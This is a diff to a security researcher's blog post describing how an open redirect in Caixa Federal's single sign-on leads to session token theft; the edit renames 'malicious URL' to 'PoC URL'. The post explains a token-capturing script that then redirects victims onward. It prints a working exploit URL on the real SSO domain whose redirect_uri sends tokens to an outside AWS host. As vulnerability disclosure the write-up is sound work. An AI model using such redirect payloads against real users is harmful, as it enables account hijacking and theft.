htrgouvea/research/_posts/publications/2020-01-03-From-Open-Redirect-to-Session-Token-Leak.md

 ```
 -

-This code is responsible for capturing and storing Session Tokens sent to the malicious URL under my control.
+This code is responsible for capturing and storing Session Tokens what are sent to the "malicious" URL under my control.
 In addition to capturing the Session Token and storing it in a log file, this script redirects the user once again, this time going to the true URL and having a genuine session on the Caixa Federal system.
 As such, it is unlikely that an ordinary user will know that he is being scammed.

-The malicious URL was as follows:
+The PoC URL was as follows:

 [https://acessoseguro.sso.caixa.gov.br/cidadao/auth?response_type=code&client_id=portal-inter&segmento=CIDADAO01&template=portal&redirect_uri=http://ec2-54-84-102-177.compute-1.amazonaws.com/](https://acessoseguro.sso.caixa.gov.br/cidadao/auth?response_type=code&client_id=portal-inter&segmento=CIDADAO01&template=portal&redirect_uri=http://ec2-54-84-102-177.compute-1.amazonaws.com/)